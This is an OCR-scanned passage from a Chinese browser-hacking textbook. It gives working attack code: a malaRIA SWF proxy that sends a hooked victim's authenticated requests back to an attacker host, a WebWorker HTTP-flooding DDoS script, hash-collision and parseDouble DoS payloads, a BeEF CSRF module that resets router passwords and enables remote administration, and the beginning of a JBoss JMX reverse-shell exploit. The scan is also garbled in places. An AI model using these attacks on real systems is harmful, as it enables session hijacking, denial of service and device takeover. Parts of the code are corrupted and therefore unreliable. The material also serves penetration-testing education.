malaRIA 包 含 两 个 组 件 : Flash 或 Silverlight 客 户 端 部 件 和 代理 后 端 。 两 个 客户 端 部 件 的 工作 方 
式 相同 , 这 里 仅 以 Flash 部 件 为 例 。 下 面 的 代码 截取 自 malariaproxymxml 中 SWF Flex 的 源 代码 。 浏 
览 器 加 载 完 SWF 文 件 后 ， 就 会 连接 回 代理 后 端 ， 等 待 指令 : 


«mx:Application xmlns:mx-"http://www.adobe.com/2006/mxml" 
layout-"absolute" xmlns-"*" 
creationComplete="useHttpService() "> 

<mx:Script> 

<![CDATA[ 

EON 








/* WEB KIL S */ 

public function useHttpService():void ( 
Socket - new Socket(); 
ExternalInterface.call("log", "Connecting back to malaRIA"); 
Socket.addEventListener(Event.CONNECT, this.connectHandler); 
Socket.addEventListener(ProgressEvent.SOCKET DATA, this.onData); 
Socket.connect("browserhacker.com", 8081); 

j 

/* 处 理 来 自 后 端的 请 求 ， 向 目标 发 送 请 求 */ 

private function onData(event:ProgressEvent):void 

{ 
ExternalInterface.call("log", "Got data from proxy"); 
var data:String = socket.readUTFBytes(socket.bytesAvailable); 
handle (data); 

j 


public function handle(data:String):void ( 
var regresult:Object = /([^ ]+) ([^ ]+) ([^ ]+)( (.*))?/.exec (data); 
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var verb:String = regresult[1]; 

var url:String = regresult[2]; 

var accept:String = regresult [3]; 

var reqData:String = regresult [5]; 

ExternalInterface.call("log", "Trying: [" + verb +" "+ url +" " 
+ accept + " "+ (verb == "POST" ? " " « reqData : "") + "]"); 

/* 按照 代理 后 端的 请 求 ， 向 目标 发 送 请 求 */ 

var urlRequest:URLRequest = new URLRequest (url); 

urlRequest.method = (verb == "POST") ? URLRequestMethod. POST 

URLRequestMethod.GET; 

if (reqData != null && reqData != "") { 


urlRequest.data = new URLVariables(reqData) ; 


var loader:URLLoader = new URLLoader(); 
loader.dataFormat - URLLoaderDataFormat.BINARY; 


/* 把 响应 发 送 给 代理 */ 

loader.addEventListener(Event.COMPLETE, onComplete); 
loader.addEventListener(IOErrorEvent.IO ERROR, onIOError); 
loader.load(urlRequest); 

ExternallInterface.call("log", "Sent"); 


public function onComplete(event:Event):void ( 

Socket.writeUTFBytes(event.target.bytesTotal + ":"); 

Socket.writeBytes(event.target.data); 

Socket.flush(); 

ExternallInterface.call("log", "Sending back data - length " + 
event.target.bytesTotal + " (" + event.target.data.length + ")"); 
} 

Es 

«/mx:Script» 
</mx:Application> 


使 用 以 下 命令 来 启动 代理 后 


sudo java malaria.MalariaServer browserhacker.com 8081 


以 上 命令 将 malaRIA 后 端 绑 定 到 8080 端 口 。 需 要 把 你 的 浏览 器 指向 这 个 端口 ， 从 而 通过 注入 
到 目标 匀 连 浏览 器 中 的 SWF 部 件 转发 流量 。8081 端 口 被 malaRIA 后 端 用 于 处 理 来 自 部 件 的 反 向 连 
搂 。 由 于 应 用 把 两 个 额外 的 套 接 字 绑 定 到 843 和 943 端 [1， 所 以 需要 root 权 限 米 启动 服务 器 . er NE 
过 程 如 图 9-31 所 示 。 
Starting listener on port 8081 from hostname browserhacker.com 


Starting http proxy on port 8080 
>> Starting MalariaServer 
































Silverlight policy server starting in port 943 for serving policy for browserhacker.com and port 8081 
Flex policy server starting in port 843 for serving policy for browserhacker.com and port 8081 








[9-31 malaRIA 代 理 准 备 接受 来 自 SWF 部 件 的 连接 
之 所 以 需要 这 两 个 端口 , 是 因为 SWF 或 Silverlight 部 件 在 连接 回 malaRIA 服 务 器 时 ， 首 先 需 
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从 browserhackercom 上 取得 跨 域 策略 。 如 果 部 件 是 SWF ， 就 会 从 843 端 口 获 取 。 如 果 是 Silverlight， 
就 指向 943 端 口 。 可 以 看 一 下 代理 后 端 代 码 中 的 FlexPolicyServer.java 类 ， 它 的 下 面 这 个 方 
法 就 是 为 了 返回 正确 的 跨 域 策略 而 写 的 : 


public static void printFlexPolicy(PrintStream clientOut, \ 
String hostname, int port) { 
clientOut.print ("<?xml version=\"1.0\"?>\n"); 
clientOut.print ("<!DOCTYPE cross-domain-policy SYSTEM \ 
\"/xml/dtds/cross-domain-policy.dtd\">"); 
clientOut.print("«cross-domain-policy»"); 
clientOut.print("«site-control permitted-cross-domain- \ 
policies=\"master-only\"/>"); 
clientOut.print("«allow-access-from domain=\"" + 
hostname + "\" to-ports=\"" + port + "\" /»"); 
clientOut.print ("</cross-domain-policy>"); 


} 
为 了 从 Flex 源 代码 中 生成 Flash SWF 文件 ， 需 要 安装 Adobe Flex SDK。 然 后 可 以 通过 如 下 命 
今 编译 源 代码 : 














mxmlc --strict=true --file-specs malariaproxy .mxml 
下 一 步 是 将 前 面 生成 的 SWF 文件 做 入 一 个 HTMI 文 件 : 
<head> 

<script> 


function log(msg) { 
var elm = document.getElementById("log"); 
elm.innerHTML += msg + "<br />"; 
j 
</script> 
</head> 
<body> 
<div id="log"> 
</div> 
<object width="0" height="0"> 
<param name="movie" value="malariaproxy.swf"> 
<embed src="malariaproxy.swf" width="0" height="0"></embed> 
</object> 


为 了 更 好 地 理解 背后 的 工作 过 程 ， 我 们 在 代码 中 包含 了 1og O 函数 这 个 额外 的 日 志 工具 。 与 
BeEF 结 合 使 用 时 ， 可 以 考虑 把 这 个 SWF 注入 一 个 已 经 匀 连 的 网 页 ， 然 后 删除 使 用 External- 
Interface.call 从 SWF 向 DOM 发 送 消息 的 日 志 代码 。 

在 下 面 的 例子 中 , 目标 已 经 登录 到 了 browservictim.com/dvwa/instructions.php。 这 个 域 暴 露 了 
/crossdomain.xml 资 源 ， 其 中 包含 允许 从 任何 域 连接 到 该 资源 的 跨 域 策略 配置 。 

你 诱骗 目标 打开 http:/browserhackercom/malariaproxy.html， 其 中 能 入 了 恶意 的 malaRIASWF 
文件 。 与 此 同时 ， 你 打开 男 一 个 浏览 器 (Opera )， 其 中 配置 使 用 了 malaRIA HTTP 代 理 后 端 。 接 

下 来 就 可 以 直接 请 求 一 个 经 过 认证 的 页 面 ， 比 如 http://browservictim.com/dvwa/vulnerabilities/ 
upload。 
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此 后 ,代理 后 端 把 请 求 细节 发 送 给 SWF， 如 图 9-32 所 示 。SWF 把 相关 的 响应 细节 再 返回 给 代 
理 后 端 ， 后 者 再 把 响应 返回 给 你 的 浏览 器 。 整 个 过 程 有 点 像 BeEF 的 Tunneling Proxy。 主 要 区 别 是 
这 里 没有 使 用 JavaScript 发 送 请 求 ， 而 是 使 用 了 SWF 文件 。 


malaRIA SWF H iE malaRIA 代 理 后 端 


| B] Damn vuinerabie web App 0v. x j| | hetp//browsern.tariapronyinimi x | + | | Storting listener on port 8881 from hostname browserhocker.com 
@ browserhacker.com /malarianre clfc qx! : ker os vind on port 8080 
MalaRIA Proxy snes eae sees ydp 
‘Connecting back to malaria server... ee Slant on 
Flex policy server»» Policy established 








E 





















































proxy 
Dying: [GET http://browservictim.com/dvwa/vulnerabilities/upload/ text/html, ] 


Sending back data - length 1357 (4513) 
Got data from proxy Reod 487 
STAR [GET http://browservictim.com/d vwa/dvwa/css/main.css text/html, } -> GET http://browservictim, com/dvwo/vulnerabilities/uplood/ text/html, 
Waiting for response from client... 
Sending back data - length 1094 (3945) ] DL: 1357 
Got data from proxy <- Read 4096:4091/1357 
Trying: (GET http://browservictim.com/dvwa/dvwa/images/logo.png text/html, ] | <- Sending 4091 to proxy client 
Sent Reod 545 
Sending back data - length 6749 (6749) -> GET http://browservictim. con dvwa/ dvwa/css/main css text/html, 
Got data from proxy | 
ing: (GET http;//browservictim.com/dvwa/dvwa/js/dvwaPage.js text/html, s 
J [ ttp: rvi com/dv' Ivwa/js/dvwaPage.js tex ] - ing 422 to cites 
i » 4 7 Reod 539 
em ene aga Bgm -> GET http://oronservictis. con/dvma/Favi con. ico text/htal, 
Trying: (GET http;/browservictim.com/dvwa/vulnerabilities/upload/ texvhtml, ] | Britino for response from client... 
Sent E 
Sending back data - length 1357 (4513) <- Read 3950: 3045/2008 
Got data from prox 


y <- Sending 3945 to proxy client 
Trying: [GET http://browservictim.com/dvwa/dvwa/js/dvwaPage js text/html, ] 


Reod 548 
-> GET http://browservictim. com/dvwa/dvwa/imoges/logo.png text/html, 


Sent 
Sending hark data - lenoth 413 (778) Waiting for response from client... 


图 9-32 ”malaRIA 的 SWF 文件 和 代理 后 端 写 的 日 志 


因为 目标 已 经 过 browervictim.com 认 证 ， 所 以 SWF 可 以 向 同一 个 域 发 送 许多 认证 过 的 请 求 。 
如 图 9-33 所 示 ， 请 求 的 认证 资源 正确 返回 了 ， 不 需要 什么 cookie 和 凭据 。 


Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: File Upload 











@ Damn Vulnerable We... x E 








€ > D B® | Q web |browservictimcom/dvwa/vulnerabilities /upload >) (BY ~ Search with c 


Vulnerability: File Upload 


Choose an image to upload: 


Proxy servers 


Choosé.. @) Use manual proxy configuration 


Upload Protocol Proxy server 
@ HTTP browserhacker.com 
More info 口 Use this proxy for all protocols 








File Inclusion 
SQL Injection 
SQL Injection (Blind) 


| Upload | 
图 9-33 ”攻击 者 的 浏览 器 配置 为 使 用 malaRIA 代 理 


到 了 这 一 步 , 实际 上 你 已 经 利用 了 目标 的 会 话 。 虽然 这 个 例子 使 用 的 是 Flash, 但 通过 一 个 恶 
意 的 Silverlight 部 件 也 能 得 到 同样 的 结果 。 
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利用 宽松 的 跨 域 策略 ， 可 以 通过 注入 到 目标 浏览 需 中 的 部 件 ,连接 到 互联 网 上 的 任意 源 ， 这 
是 其 最 有 威胁 的 地 方 。 如 果 攻 击 目标 恰好 又 在 多 个 不 同 的 源 获得 了 认证 , 而且 这 些 源 都 配置 了 宽 
松 的 跨 域 策略 ,那么 攻击 的 收效 将 会 非常 之 大 。 你 的 恶意 部 件 此 时 可 以 向 所 有 源 发 送 请 求 , 并且 
将 响应 转发 给 你 。 


9.9 ”启动 拒绝 服务 攻击 


提 到 DoS ( Denial-of-Service, 拒绝 服务 ) WH, 多数 人 的 第 一 印象 就 是 一 个 发 送 大 量 请 求 的 
僵尸 网 络 。 我 们 知道 ， 浏 览 器 同样 可 以 发 送 请 求 ， 而 且 可 以 使 用 简单 的 指令 让 它 跨 域 发 送 请 求 。 
本 节 就 来 探讨 在 DoS 攻 击 中 使 用 这 个 功能 的 后 果 。 


9.9.1 Web 应 用 的 痛 点 


很 多 Web 应 用 都 有 一 些 页 面 或 资源 ,执行 起 来 需要 消耗 一 定 的 计算 能 力 或 时 间 才 能 完成 。 比 
如 动态 执行 多 个 查询 、 联 结 多 个 大 表 的 操作 就 需要 较 长 时 间 。 相 对 于 图 片 或 静态 HTML 文 件 等 静 
态 资 源 而 言 ， 这 个 时 间 就 显得 更 突出 了 。 如 果 你 想 生 成 DoS 疫 情 ， 或 仅仅 想 拖 慢 某 个 目标 应 用 ， 
那 简单 地 向 其 中 一 个 响应 慢 的 资源 发 送 多 个 请 求 就 可 以 了 。 如 果 同 时 从 多 个 地 方 同时 向 一 个 这 样 
的 资源 发 送 多 个 请 求 ， 那 么 破坏 效果 会 被 放大 。 相 对 于 基于 TCP 的 同步 洪流 攻击 ， 通 过 攻击 Web 
应 用 中 的 痛 点 来 拖 慢 服务 器 ， 或 者 对 服务 器 发 动 DoS 攻 击 ， 显 然 更 可 行 ， 也 更 便捷 。 

从 语言 层面 上 看 ，Java、PHP 、Python 等 都 已 经 被 爆 出 很 多 漏洞 ， 攻 击 者 可 以 利用 它们 发 动 
DoS 攻 击 。 相 关 的 利用 包括 对 大 数 的 解析 ， 或 者 对 特殊 编制 的 散 列 数 据 结 构 的 处 理 等 操作 ， 都 可 
以 把 运行 速度 降低 到 无 法 容忍 的 程度 。 这 类 攻击 有 可 能 影响 使 用 某 种 编程 语言 的 所 有 应 用 ， 因 此 
比 单纯 攻击 一 个 应 用 具有 更 大 的 攻击 面 。 

对 Web 应 用 发 动 DoS 攻 击 ， 特 别 是 请 求 响应 慢 的 服务 和 动态 资源 ， 将 在 后 面 的 小 节 讨论 。 

1. 散 列 碰撞 DoS 

2011 年 底 ， 有 人 爆料 ”， 多 个 编程 语言 存在 DoS 攻 击 漏洞 ， 前 提 是 要 让 这 些 语言 对 一 个 特别 
编制 的 散 列 表 求 值 。 涉 及 的 语言 有 PHP 、Python 、Java 和 Ruby。 可 悲 的 是 ， 很 多 以 上 述 语言 开发 
的 Web 应 用 框架 都 有 一 个 共同 的 特点 : 它们 都 会 在 解析 完 原 始 HTTP 请 求 之 后 ， 把 响应 首部 和 响 
应 体 存 储 在 一 个 散 列 对 象 中 。 从 开发 角度 来 看 ,这 样 保存 和 查询 HTTP Request 28 4R 77 f HTTP 
参数 就 是 key=value， 而 散 列 的 数据 结构 也 是 key=value。 

按照 设计 ， 散 列表 不 能 包含 重复 的 键 ， 而 在 插入 N 个 具有 相同 碰撞 键 的 情况 下 ， 算 法 复杂 度 
会 变 成 o(N^2) 。 其 他 语言 C 比如 Perl ) 的 开发 者 在 2003 年 就 预见 到 了 这 个 潜在 的 问题 ,于 是 在 其 
散 列 函数 中 添加 了 随机 化 机 制 。 他 们 这 种 积极 的 应 对 有 效 地 防止 了 这 种 DoS 攻 击 。 

Java 和 PHP 中 的 字符 串 散 列 函数 使 用 了 DJBX33A 算 法 ， 该 算法 存在 “相同 子 字符 串 ” 漏 洞 。 
下 面 我 们 通过 一 段 Java 代 码 ， 来 看 看 如 何 发 起 这 种 攻击 : 


public class HashCode{ 
public static void main(String[] args) { 
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String 
String 
String 
String 


System. 
System. 
System. 
System. 


} 
} 


a= "Aa"; 

b = "BB"; 

c = "AaBBBBAa"; 

d = "BBAaAaBB"; 
out.println("Hash code for 


out.printin 


"Hash code for 


( 
out.println("Hash code for 
( 


out.printin 


"Hash code for 


"etii 
"beni 
dE een 
"+dt+":" 


a.hashCode 
b.hashCode 
a.hashCode 
b.hashCode 


二 十 十 十 





如 果 运 行 上 面 的 代码 , 它 会 对 四 个 不 同 的 字符 串 都 返回 相同 的 散 列 值 : 2112。 利用 这 个 特点 ， 
就 可 以 创建 一 个 以 这 种 字符 串 为 键 的 散 列表 ,而 这 些 字符 串 的 散 列 值 是 冲突 的 。 这 种 情况 下 的 计 
如 果 让 应 用 同时 处 理 多 个 包含 


算 量 超级 大 3， 
利用 很 多 Web 应 用 村 

















碰撞 

















交 一 个 POST 请 求 ， 然 后 在 请 求 体 中 将 参数 的 键 设置 为 冲突 的 ， 比 如 : 


Aa=Aa&BB=BB&AaBBBBAa=AaBBBBAa&BBAaAaBB=BBAaAaBB&[... ] 





























这 个 例子 是 不 是 很 有 意思 ? UL] 


2. Function parseDouble() DoS 
2011 年 , Rick Regan 和 Konstantin PreiBer 发 现 ”, Java 1.5 到 Java 1.6u22, 以 及 PHP 5.2 和 PHP 5.3, 


在 将 字符 串 转 换 成 双 精 度 浮 点 数 ( Java 中 的 Double 对 象 ) AY, 
用 了 有 风险 的 代码 ， 比 如 Doubl 





.parseDoubl 





会 出 现 DoS 漏 洞 。 如 果 Web 应 用 使 


(request.getParameter ("id")) ， 而 恰好 


键 的 大 散 列 ， 则 攻击 效果 会 放大 。 
E 架 在 解析 原始 HTTP 请 求 后， 会 把 数据 存储 在 散 列表 中 的 事实 ， 可 以 提 





一 个 简单 的 设计 决定 ， 可 能 会 招致 影响 广泛 的 恶果 。 





id 参 数 的 值 是 2 .2250738585072012e-308 或 者 0.022250738585072012e-00306， NUM 
就 会 无 限 循 环 。 无 论 对 Web 应 用 还 是 应 用 服务 需 来 说 ， 这 实际 上 就 是 DoS 攻 击 。 产 生 这 种 结果 的 
原因 是 Java 和 PHP 的 浮 点 实现 中 存在 缺陷 。 


通过 勾 连 浏览 


跨 域 发 动 这 种 攻击 ， 
一 个 接受 数值 参数 值 的 Java 服 务 端 小 程序 ， 





9.9.2 ”使 用 多 个 勾 连 浏览 器 DDoS 


对 Web 应 月 
以 从 任何 Web 浏 览 器 中 发 出 ， 








简直 是 小 菜 一 碟 。 创 建 一 














分 布 式 拒 绝 服 务 攻击 (Distributed Denial-of-Service, DDoS )。 


以 下 面 这 个 简单 的 Ruby Web 应 用 为 例 ， 
于 向 MySQL 数 据 库 中 插 
同一 个 数据 库 。 





require 
require 
require 
require 
require 
require 











'rubygems' 
'thin' 
'rack' 
'sinatra' 
‘ogi! 
'mysgl' 


它 接受 两 个 请 求 : 
RA (insert ) 新 数据 ; 


一 个 GET 请 求 ， 通 过 联结 








一 个 GET 或 POST 请 求 ， 发 送 给 
使 用 前 面 提 到 的 任何 一 个 值 就 够 了 。 





目的 DoS 攻 击 , 不 一 定 要 从 攻击 者 控制 的 操作 系统 上 发 起 。 挤 压痛 点 的 HTTP 请 求 可 
甚至 可 以 从 多 个 浏览 锅 中 同时 发 出 。 对 于 后 一 种 情况 ， 实 际 上 就 是 




















一 个 POST 请 求 ， 期 待 两 个 参数 用 


(join ) 两 个 表 来 查询 
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class Books < Sinatra::Base 
post "/" do 
author = params[:author] 
name = params[:name] 
db = Mysql.new('127.0.0.1', 'root', 'toor', 'books') 
statement = db.prepare "insert into books (name,author) \ 
values (?,?);" 
statement.execute name, author 
statement.close 
"INSERT successful" 














end 
get "/" do 
book_id = params[:book_id] 
db = Mysql.new('127.0.0.1', 'root', 'toor', 'books') 
statement = db.prepare "select a.author, a.address, b.name \ 
from author a, books b where a.author = b.author" 
statement .execute 
result = "" 
statement.each do |item| 
result += CGI::escapeHTML (item.inspect)+"<br>" 
end 
statement.close 
result 
end 
end 
@routes = { 


"/books" => Books.new, 


} 


@rack_app = Rack: :URLMap.new(@routes) 
Gthin = Thin::Server.new("172.16.37.150", 80, @rack_app) 


Thin::Logging.silent - true 
Thin::Logging.debug - false 


puts "[#{Time.now}] Thin ready" 
Gthin.start 


CAMS, 你 可 能 就 会 发 现 应 用 的 痛 点 了 。 对 数据 库 表 的 联结 涉及 两 个 表 , 其 中 一 个 是 POST 
请 求 会 更 新 的 表 。 如 果 你 能 同时 发 送 多 个 POST 请 求 ， 同 时 又 执行 多 个 GET 请 求 ， 那 么 联结 操作 
就 会 随 着 数据 增加 而 繁忙 起 来 。 

通过 色 连 浏览 器 跨 域 发 送 多 个 HTTP 请 求 的 最 好 方式 是 使 用 WebWorker。 这 样 基 本 不 会 影响 
页 面 泻 染 和 浏览 器 的 其 他 操作 。WebWorker 是 HTML5 引 入 的 , 包括 正 10 在 内 的 所 有 现代 浏览 器 都 
支持 ， 是 一 种 在 后 台 线 程 中 执行 脚本 的 机 制 。 在 WebWorker 中 运行 的 代码 不 能 直接 修改 页 面 的 
DOM， 但 可 以 发 送 XHR 请 求 。 

要 启动 一 个 WebWorker 任 务 ， 可 以 使 用 以 下 代码 : 


var worker = new Worker('http://browserhacker.com/worker.js'); 




















Me 
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worker.onmessage = function (oEvent) { 
console.log('WebWorker says: '-«oEvent.data); 
he 


var data = {}; 


data['url'] url; 
data['delay'] = delay; 
data['method'] = method; 
data['post data'] = post data; 


/* 把 配置 发 给 WebWorke */ 
worker.postMessage(data); 


这 里 的 postMessage() 用 于 在 运行 JavaScript 勾 连 代码 的 DOM 与 WebWorker 之 间 共 享 数 据 。 
WebWorker 的 代码 可 以 像 下 面 这 样 写 : 


yar Gris m. 

var delay = 0; 

var method = ""; 
var post_data = ""; 
var counter = 0; 


/* 通过 postMessage 取 得 数据 */ 

onmessage = function (oEvent) { 

url = oEvent.data['url']; 

delay = oEvent.data['delay']; 

method = oEvent.data['method']; 

post data = oEvent.data['post_data']; 
doRequest (); 

138 


/* 给 URL 添 加 随机 参数 ， 避 免 缓存 */ 
function noCache(u) { 

var result = ""; 
if(u.indexOf("?") > O)( 


result = "&" + Date.now() + Math.random(); 
Jelse{ 

result = "?" + Date.now() + Math.random() ; 
j 
return result; 


} 
/* 每 gelay 毫 秒 发 送 一 次 POST 或 GET 请 求 */ 
function doRequest () { 

setInterval (function() { 





var xhr = new XMLHttpRequest (); 

xhr.open(method, url + noCache(url)); 

xhr.setRequestHeader('Accept','*/*'); 

xhr.setRequestHeader("Accept-Language", "en"); 

if(method -- "POST")( 
xhr.setRequestHeader("Content-Type", 
"application/x-www-form-urlencoded"); 
xhr.send(post, data); 
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}else{ 
xhr.send(null); 
} 


counter++; 
},delay) ; 


/* 每 10 秒 通知 一 次 调用 者 发 送 了 多 少 请 求 */ 
setInterval (function() { 
postMessage("Requests sent: " + counter); 
},10000); 

j 


Ko alae E ， 让 它们 都 向 本 节 前 面 的 那个 Ruby Web 应 用 
请 求 ， 就 会 看 到 资源 占用 逐渐 增加 。 图 9-34 展 示 了 应 用 正常 使 用 过 程 中 的 系统 负载 。 


1 E ] Tasks: 46 total, 1 running 

2r ] Load average: 0.00 0.00 

Memp!!l LE LLL VLEEEEEEEEEEEEEEEEEEEE ELLE EE ELLE LLL LL LL 11111327 ] Uptime: 01:58:36 
] 


PID USER NI VIRT MEI 


ssss99 


M% 
9.1 
90.1 
9.1 
9.1 
9.1 
9.1 
9.1 


[2 
LE 
9 
9 
0 
0 
9 
9 


1 En Tasks: 63 total, 2 running 


J 
J Load average: 0.00 0.00 
1 
1 


2 I 
MemEI ITI LLL WHT ELE ELLE ELE LLL LLLI T1367 Uptime: 02:02:16 
Swp[ 


PID USER NI VIRT RES 

1924 root 0 86912 22916 . .2 0:10.92 ruby dos server.rb 
0 234M 26000 A .5 0:00.89 /usr/sbin/mysqld --basedir=/usr --datadirs/var/lib/mysql 
@ 234M 26000 M s 04 /usr/sbin/mysqld --basedir=/usr --datadir=/var/Lib/mysql 
0 19724 1516 A s :01.01 htop 
0 8356 724 : .1 0:00.96 init [2] 
^ 17068 1148 . .1 0:00.05 udevd --daemon 


图 9-35 (EFS ED ESTE BY A Soe A ER 


TEA — PAE IV d PU H3 — 1 WebWorker, #10228) RIX—PPOSTHPR Za, FT LAH 
过 图 9-36 看 到 系统 负载 明显 的 变化 。 与 图 9-35 相 比 ， 负 载 的 变化 非常 大 。 这 是 因为 一 个 浏览 器 在 
不 断 发 送 POST 请 求 ， 会 导致 执行 数据 库 插入 语句 。 而 与 此 同时 另 一 个 匀 连 浏览 器 又 在 发 送 GET 
请 求 ， 会 导致 联结 查询 的 数据 集 在 每 个 请 求 之 后 都 会 变 大 。 这 些 后 台 活动 导致 了 负载 增加 。 

在 找到 类 似 的 Web 应 用 痛 点 后 ,不 一 定 非 要 通过 数据 库 操作 ,通过 上 传 文件 也 可 以 轻易 对 任 
何 Web 应 用 制造 DoSs 风 暴 。 如 果 你 手中 控制 了 多 个 勾 连 浏 览 器 ,那么 相应 的 DoS 攻 击 后 果 会 更 加 
严重 ， 而 且 你 可 以 让 多 个 勾 连 浏览 器 都 指向 同一 个 目标 ， 证 每 一 秒 钟 的 并 发 请 求 数量 激增 。 
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Tasks: 51 total, 3 r 
Load average: o. 22 e e1 


1 EHHHHEEEELEEEEEEEEEEEEELEEEEEEEE EE EE EEE EE EE ELE EE LEE EE EL E E 4 
2 [I 


i 
Mem1Il Hl b n lg PORTE CEPT ELE EL ELEE ELT EL LT 0111447 ] Uptime: 02:03:16 
Swp[ 1 


PID USER 
L 


--datadire/var/lib/mysql -- 
--datadire/var/lib/mysql --use 
datadi. ib/mysql --i 
和 ed --basedire/usr S MU SA MEA -| 
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RCE ( Remote Command Execution ， 远 程 命令 执行 ) 漏洞 属于 另 一 类 漏洞 ， 有 时 候 并 不 需要 
访问 HTTP 响 应 ， 因 此 可 以 育 攻 。 在 无 法 绕 过 SOP 限 制 又 无 法 读 取 HTTP 响 应 的 情况 下 ， 这 一 点 非 
常 重要 。 假 如 你 知道 某 个 Web 应 用 存在 RCE 漏 洞 ， 那 么 只 要 发 送 一 个 恶意 请 求 就 好 ， 而 不 用 关心 
响应 。 

从 色 连 浏览 器 而 非 直 接 从 你 的 机 器 发 动 此 类 攻击 有 两 个 好 处 。 一 是 增强 匿名 性 , 因为 攻击 的 
源 IP 是 受害 者 的 IP。 二 是 内 网 上 的 目标 可 和 也 在 勾 连 浏览 器 的 范围 内 ， 而 这 些 目标 的 安全 性 可 能 
不 如 直接 从 互联 网 访问 的 设备 那么 完善 。 于 是 ， 这 就 可 能 为 你 提供 新 的 攻击 目标 。 

在 接 下 来 的 几 小 节 中 ,我 们 会 展示 实际 中 存在 的 各 种 Web 应 用 漏洞 。 或 许 你 在 此 之 前 已 经 了 
解 了 其 中 的 某 些 漏洞 ， 但 后 面 的 内 容 会 告诉 你 如 何 通过 色 连 浏览 器 来 有 效 地 发 动 这 种 利用 攻击 。 


9.10.1 it DNS 劫持 


在 控制 了 目标 的 家 用 路 由 器 的 时 候 , 更 改 DNS 服务 器 配置 是 威胁 最 大 的 一 件 事 。 大 多 数 家 用 
路 由 器 会 同时 充当 家 庭 上 网 设备 的 DHCP 和 DNS 服务 器 。 通 常 ， 默 认 的 DNS 地 址 指向 用 户 ISP 的 
DNS 服务 器 。 

如 果 把 路 由 需 中 配置 的 DNS 地 址 修改 为 一 个 你 可 以 控制 的 服务 器 地 址 ， 那 就 可 以 轻松 发 动 
DNS 欺骗 攻击 ， 就 像 第 2? 章 讨论 中 间 人 攻击 时 所 讨论 的 一 样 。 

现实 当中 这 种 攻击 的 例子 非常 多 。 其 中 最 有 名 的 应 该 是 2011 年 和 2012 年 发 生 在 巴西 的 攻击 ”。 
根据 Brazilian CERT 的 消息 ”*， 有 450 多 万 台 路 由 器 被 次 用 了 。 被 次 用 的 路 由 器 是 Comtrend 
CT-5367, 它 启 用 了 远程 管理 功能 。 另外 ,这 种 路 由 器 也 存在 密码 重 置 的 漏洞 这 种 大 范围 的 攻 
击 是 通过 以 下 几 步 实施 的 。 

(1) 攻击 者 扫描 巴西 ISP 网 络 中 的 数 百 万 台 主 机 的 端口 ,验证 哪个 主机 是 存在 漏洞 的 Comtrend 
路 由 需 。 

(2) 然后 , 攻击 者 将 这 些 路 由 需 中 的 DNS 设置 改 为 他 们 控制 下 的 约 40 台 DNS 服务 器 中 的 一 个 。 

(3) 最 后 ， 他 们 将 对 Google 、Facebook 及 其 他 常用 网 站 的 DNS 响 应 算 改 为 钓鱼 网 站 ， 这 些 网 
站 存在 CVE-2012-1723 和 CVE-2012-4681 等 Java 漏 洞 。 

以 下 代码 展示 了 通过 Comtrend 路 由 器 发 动 的 一 种 攻击 。 在 匀 连 浏览 器 上 执行 它 时 , 会 导致 默 
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认 的 密码 被 修改 ， 并 且 启 用 远程 管理 功能 : 


var gateway 
var passwd 





= 'http://192.168.1.1/'; 

= 'BeEF12345'; 

// 启用 远程 管理 〈 如 果 禁 用 ) 

var iframe 1 = beef.dom.createInvisibleIframe(); 
iframe 1.setAttribute("src", 
gateway + "scsrvcntr.cmd?action-save&ftp-l&ftp-3" + 
"&http-1&http-3&icmp-1&snmp-1&snmp-3&ssh-1&ssh-3" + 
"&celnet-1&telnet-3&tftp-1&tftp-3"); 





// 为 3 位 用 户 角色 修改 密码 


var iframe 2 = beef.dom.createlframeXsrfForm ( 

gateway + "password.cgi", "POST", [ 
{'type': 'hidden', 'name':'sptPassword', 'value':passwd}, 
{'type':'hidden', 'name':'usrPassword', 'value':passwd}, 
{'type': 'hidden', 'name':'sysPassword', 'value':passwd) 


DE 
如 果 代 码 执行 成 功 ， 就 可 以 连接 到 目标 的 PP， 并 使 用 新 密码 登录 到 远程 管理 界面 。 然 后 ， 就 
可 以 把 DNS 服务 器 地 址 改 成 任何 你 想 要 的 地 址 了 。 























9.10.2 JBoss JMX 跨 域 远程 命令 执行 


JBoss 是 RedHat 出 品 的 一 款 流行 的 Java 应 用 服务 器 软件 ， 一 直 以 来 都 存在 一 些 漏洞 。2010 年 ， 
Stefano di Paola 和 Giorgio Fedon 发 布 了 一 个 报告 ， 即 CVE-2010-0738， 涉 及 JBoss 4.x, 5.1.0, HB 
6.0.0M1. 

问题 出 在 JMX (Java Management Extensions Console ) 的 HTTP verbs 配 置 问题 上 。JMX 是 一 
种 监控 应 用 服务 器 加 载 和 性 能 的 技术 。 开 发 者 也 可 以 通过 WAR 文 档 或 JSP 文 件 的 形式 部 署 新 的 
Web 应 用 。 

在 JBoss 中 ，JMX 是 一 个 好 用 的 Web 应 用 ,通常 可 以 使 用 /jimx-console 这 个 URI 访 问 ， 这 个 URI 
默认 是 不 要 求 认 证 的 。 如 果 启 用 了 认证 ， 也 只 会 检查 GET 和 POST 请 求 ， 看 它们 是 否 有 权限 访问 
/imx-console 资 源 。 作 为 多 才 多 艺 的 渗透 测试 者 , 我 们 当然 知道 除了 GET 和 POST, 还 有 其 他 HTTP 
方法 。 比 如 ,， HEAD 请 求 在 实际 使 用 中 与 GET 的 功能 就 很 类 似 。 也 就 是 说 , 在 启用 认证 的 情况 下 , 
攻击 者 可 以 发 送 HEAD 请 求 ， 代 替 GET 或 POST 请 求 来 绕 过 JMX 认 证 。 

此 时 , 如 果 你 有 权限 访问 JBossJMX Console, 那 从 某 种 意义 上 来 说 , 你 就 可 以 掌握 一 切 了 ”。 
有 了 这 个 级 别 的 访问 权限 , 就 可 以 部 署 WAR ( Web Application Archive ) 或 JSP ( Java Server Pages ) 
形式 的 新 Web 应 用 。 举 个 例子 来 说 ， 你 可 以 部 署 一 个 JSP 页 面 ， 生 成 绑 定 或 反弹 shell， 而 它们 也 
将 拥有 与 JBoss 用 户 相 同 的 权限 。 

以 下 代码 演示 了 BeEF 中 的 一 个 模块 ， 它 被 用 来 绕 过 JMX 认 证 并 部 署 反 弹 JSP shell: 


beef.execute(function() { 





















































rhost 
rport 


"c$- Qrhost %>"; 
"<%= Qrport %>"; 
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lhost = "<%= @lhost %>"; 

lport = "<%= @lport %>"; 

injectedCommand = "<%= @injectedCommand %>"; 

jspName = "<%= @jspName %>"; 

payload = "[.]"; 

uri = "/jmx-console/HtmlAdaptor; index.jsp?action=invokeOp&name=\ 


jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=\ 
